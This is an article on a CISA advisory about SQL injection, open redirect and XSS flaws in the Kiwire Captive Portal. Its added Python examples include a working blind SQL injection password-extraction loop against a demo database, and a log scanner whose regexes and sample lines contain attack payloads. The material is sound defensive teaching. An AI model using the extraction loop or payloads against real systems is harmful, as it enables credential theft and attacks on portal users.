CISA issues alert on Kiwire Captive Portal vulnerabilities and vendor fixes
The Kiwire Captive Portal by SynchroWeb, a product that fronts internet access for guest users on shared networks, is affected by three vulnerabilities: a Structured Query Language (SQL) injection, an open redirect, and a cross-site scripting (XSS) flaw. CISA has published an advisory on the issues, which could be exploited to compromise the portal's backend or the clients that authenticate through it.
The three issues are tracked as CVE-2025-11188, CVE-2025-11190 and CVE-2025-11189. The SQL injection is a blind injection in the nas-id parameter: the value is incorporated into a database query without proper sanitisation, so an attacker can run SQL of their own against the backend database, inferring results one true/false response at a time even though the page never returns query output directly. The login-url parameter carries two separate problems. It is used as a redirect target without being validated, so an attacker can send a user who completes the login flow to any external site; and its value is reflected into the page without output encoding, so a crafted link executes attacker-supplied JavaScript in the browser of whoever opens it. The affected Kiwire versions are listed in the advisory, which treats the three flaws as independent issues, each with its own exploitation path.
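To make the two parameter-handling flaws concrete, the following is an added example written for this page in Python; it is not Kiwire's code, whose implementation is not shown here. It models the nas-id lookup as a blind SQL injection sink (with the boolean-based extraction loop an attacker would run against it) next to the parameterised version, and the login-url handling as an open redirect and reflected XSS next to a validated, escaped version. The in-memory SQLite schema, the table and column names, the admin password and the portal hostname portal.example.net are all assumptions for the demonstration.

```python
import html
import sqlite3
from urllib.parse import urlsplit

# Constructed in-memory stand-in for the portal's backend database. The
# table and column names are assumptions for this example, not Kiwire's schema.
def build_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE nas (nas_id TEXT PRIMARY KEY, name TEXT);
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO nas VALUES ('nas001', 'Lobby AP');
        INSERT INTO admins VALUES ('admin', 'Secret42');
        """
    )
    return conn


def nas_exists_vulnerable(conn: sqlite3.Connection, nas_id: str) -> bool:
    # The blind-injection pattern: the request parameter is pasted into the
    # SQL text. The caller only learns "known NAS" or "unknown NAS", so the
    # attacker cannot read rows directly but can ask one yes/no question per
    # request.
    sql = f"SELECT name FROM nas WHERE nas_id = '{nas_id}'"
    return conn.execute(sql).fetchone() is not None


def nas_exists_safe(conn: sqlite3.Connection, nas_id: str) -> bool:
    # Parameterised query: the value is bound by the driver and never parsed
    # as SQL, so quotes and comment markers in it are just characters.
    row = conn.execute("SELECT name FROM nas WHERE nas_id = ?", (nas_id,)).fetchone()
    return row is not None


def blind_extract(oracle, max_len: int = 16) -> str:
    # Boolean-based blind extraction against the vulnerable lookup: guess the
    # admin password one character at a time using a true/false oracle.
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                "nas001' AND substr((SELECT password FROM admins LIMIT 1),"
                f"{pos},1)='{ch}' -- "
            )
            if oracle(payload):
                recovered += ch
                break
        else:
            break  # no guess matched: end of string, or a char outside the alphabet
    return recovered


# Host the portal itself is served from; an assumption for this example.
ALLOWED_HOSTS = {"portal.example.net"}


def safe_login_url(value: str, fallback: str = "/") -> str:
    # Open-redirect guard for login-url: accept only a same-site relative
    # path, or an absolute https URL whose host is on the allow-list.
    # Foreign hosts, protocol-relative "//evil", javascript: and data: URLs
    # all fall back to a fixed local destination.
    if not value:
        return fallback
    parts = urlsplit(value)
    if parts.scheme == "" and parts.netloc == "":
        if value.startswith("/") and not value.startswith("//") and "\\" not in value:
            return value
        return fallback
    if parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS:
        return value
    return fallback


def render_login_link(login_url: str) -> str:
    # Reflected-XSS guard for the same parameter: validate the destination,
    # then HTML-escape it before it lands inside an attribute. Validation
    # alone is not enough, because a syntactically valid local path can still
    # carry quotes or angle brackets.
    return f'<a href="{html.escape(safe_login_url(login_url), quote=True)}">Continue</a>'


if __name__ == "__main__":
    db = build_demo_db()
    print(blind_extract(lambda p: nas_exists_vulnerable(db, p)))   # Secret42
    print(blind_extract(lambda p: nas_exists_safe(db, p)))         # (empty string)
    print(safe_login_url("https://evil.example/login"))            # /
    print(render_login_link('/welcome?next="onmouseover="alert(1)'))
```

Run against the vulnerable lookup, the extraction loop recovers the whole admin password with nothing but a "known/unknown" response per request, which is exactly what a blind injection gives an attacker; against the parameterised lookup every probe is simply an unknown NAS. On the login-url side the two fixes are deliberately separate: the allow-list stops the redirect, the escaping stops the injection, and dropping either one leaves the other flaw open.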
In practice, the SQL injection lets an attacker retrieve sensitive information from the portal's database, the open redirect lets them send users who are trying to log in to an attacker-controlled site, and the XSS lets them run JavaScript on the devices of users attempting to get online through the portal. The advisory also notes that the domains involved in the XSS and open redirect are locally trusted on most client devices, because the portal is the page a device is steered to before it has any internet connectivity; a redirect or injected script served from that origin is therefore more likely to be accepted by both the device and the user than one from an unknown site.
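For operators who cannot patch immediately, or who want to know whether the portal was probed before the patch went in, the following added example (written for this page, not part of the advisory or SynchroWeb's tooling) scans web-server access logs for the three attack shapes described above: SQL metacharacters in nas-id, a foreign absolute URL in login-url, and script-bearing schemes or markup characters in login-url. The /portal/ request path, the hostname portal.example.net and the sample log lines are constructed for the demonstration; the parameter names are the ones the advisory identifies. The indicators are heuristics meant for triage, not a substitute for the vendor fix.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hostname the portal is served from; an assumption for this example.
PORTAL_HOSTS = {"portal.example.net"}

# Apache/nginx "combined"-style access line; only the fields used here are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Crude but useful SQL-injection indicators for a value that should be a
# plain NAS identifier: quotes, comment markers, boolean tautologies and
# the functions blind-injection tooling leans on.
SQLI_HINT = re.compile(
    r"'|--|/\*|\b(?:or|and)\b\s+\S+\s*=|\b(?:substr|sleep|benchmark|union)\b",
    re.IGNORECASE,
)

# Raw markup characters that have no business in a redirect target.
MARKUP_CHARS = re.compile("[<>\"']")


def classify_target(target: str) -> list[str]:
    """Return finding tags for one request target (path plus query string)."""
    findings = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in params.get("nas-id", []):
        if SQLI_HINT.search(value):
            findings.append("sqli:nas-id")
    for value in params.get("login-url", []):
        parts = urlsplit(value)
        # Script-bearing schemes or raw markup: reflected-XSS attempt.
        if parts.scheme.lower() in {"javascript", "data", "vbscript"} or MARKUP_CHARS.search(value):
            findings.append("xss:login-url")
        # Absolute URL (including protocol-relative) to a host other than
        # the portal: open-redirect attempt.
        if parts.netloc and parts.hostname not in PORTAL_HOSTS:
            findings.append("redirect:login-url")
    return findings


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, raw target, findings) for suspicious lines only."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        findings = classify_target(m["target"])
        if findings:
            hits.append((m["ip"], m["target"], findings))
    return hits


# Constructed sample lines: one benign request, one blind-SQLi probe against
# nas-id, one open-redirect attempt and one reflected-XSS attempt via login-url.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Oct/2025:10:14:02 +0000] "GET /portal/?nas-id=nas001&login-url=%2Fwelcome HTTP/1.1" 200 512
203.0.113.9 - - [21/Oct/2025:10:15:11 +0000] "GET /portal/?nas-id=nas001%27%20AND%20substr((SELECT%20password%20FROM%20admins),1,1)%3D%27S%27%20--%20 HTTP/1.1" 200 512
198.51.100.7 - - [21/Oct/2025:10:16:40 +0000] "GET /portal/?nas-id=nas001&login-url=https%3A%2F%2Fevil.example%2Flogin HTTP/1.1" 302 0
198.51.100.7 - - [21/Oct/2025:10:17:03 +0000] "GET /portal/?nas-id=nas001&login-url=javascript%3Aalert(document.cookie) HTTP/1.1" 200 640
"""

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, target)
```

Two points are worth keeping in mind when adapting this. Percent-decoding happens inside parse_qs, so the patterns are matched against what the application would have seen rather than the encoded bytes in the log, which defeats the most common evasion. And a single blind-injection probe in the log is almost never alone: the extraction loop sends hundreds of near-identical requests from one client, so counting sqli:nas-id hits per source address is a stronger signal than any one line.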
SynchroWeb has released updates that resolve the three vulnerabilities, has published a security advisory on its website, and says it will contact users of affected versions directly to help them update and patch.
The advisory credits the researchers who reported the vulnerabilities and collects the technical details and reference material. Users of the Kiwire Captive Portal are urged to apply the vendor-supplied patches to mitigate these risks.